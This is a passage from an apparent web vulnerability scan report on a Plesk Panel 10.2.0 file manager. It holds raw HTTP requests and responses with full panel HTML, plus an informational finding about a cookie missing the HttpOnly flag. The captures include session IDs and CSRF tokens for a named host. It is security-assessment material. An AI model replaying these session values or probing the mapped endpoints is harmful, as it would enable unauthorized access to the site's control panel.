Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvcNELhCBJg408XAA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 1138

------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="cmd"

new_file
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="wizaction"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="filter"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page"

0
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page_size"

25
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="sort"

name
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="file"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="subcmd"


------WebKitFormBoundaryvcNELhCBJg408XAA--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:34:04 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:34:04 GMT
Connection: close
Content-Length: 23875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager_new_file/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="new_file">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   




<div class="filemanagerTitle">
   Create new file in <span class="name"><A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a></span>
</div>

<div class="formArea">
   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-upload_file_method" value="upload" > <label for="fid-upload_file_method">Upload file</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[0]"> <label for="fid-extract1">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[0]" id="fid-extract1" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[1]"> <label for="fid-extract2">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[1]" id="fid-extract2" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[2]"> <label for="fid-extract3">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[2]" id="fid-extract3" value="true"></td>
           </tr>
       </table>

   </td></tr></table></fieldset>

   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-create_file_method" value="upload" checked> <label for="fid-create_file_method">File creation</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">File name <span class="required">*</span></td>
               <td><input type="text" name="new_file" value=""></td>
           </tr>

           <tr>
               <td class="name">Use HTML template</td>
               <td><input type="checkbox" class="checkbox" name="htmltemplate" value="true"></td>
           </tr>

       </table>

   </td></tr></table></fieldset>
</div>






















<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">



   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter the file name and click to create it in the current directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);create_file_oC();;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);create_file_oC();;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);cancel_oC();;return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);cancel_oC();;return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.24. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/edit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:37 GMT
Connection: close
Content-Length: 56914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
